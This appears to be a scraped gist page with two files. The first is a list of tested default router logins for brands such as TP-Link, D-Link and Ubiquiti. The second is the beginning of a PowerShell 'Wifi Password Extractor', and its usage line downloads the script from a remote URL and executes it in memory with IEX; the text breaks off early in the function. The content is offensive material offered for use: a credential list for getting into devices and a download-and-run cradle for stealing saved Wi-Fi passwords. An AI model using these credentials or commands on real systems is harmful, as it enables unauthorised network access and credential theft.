This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
TESTED ROUTER DEFAULT PASSWORDS: @SpiderSec | |
---------------------------------------------------------------------------------------- | |
Digisol : user=admin,pass=1234 (Tested on DG-HR3400) | |
D-Link : user=Admin,pass=blank (Tested on DIR-615) | |
TP-Link : user=admin,pass=admin (Tested on WR720N 2.0) | |
Ubiquiti : user=ubnt,pass=ubnt (Tested on EdgeRouter 12 (ER-12)) | |
Tenda : user=admin,pass=admin (Tested on Tenda N301 ) | |
Mercusys : user=admin,pass=admin (Tested on Mercury MW305R ) | |
iBall : user=admin,pass=admin (Tested on iB-WRB333N ) | |
Netis : user=guest,pass=guest (Tested on Netis WF2411 ) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Wifi Password Extractor | |
# USAGE:- IEX (New-Object Net.WebClient).DownloadString('https://url/Extract-WiFi-Creds.ps1'); Extract-Wifi | |
function Extract-Wifi { | |
[CmdLetBinding()] | |
param( [string]$network ) | |
if ( $network ) { |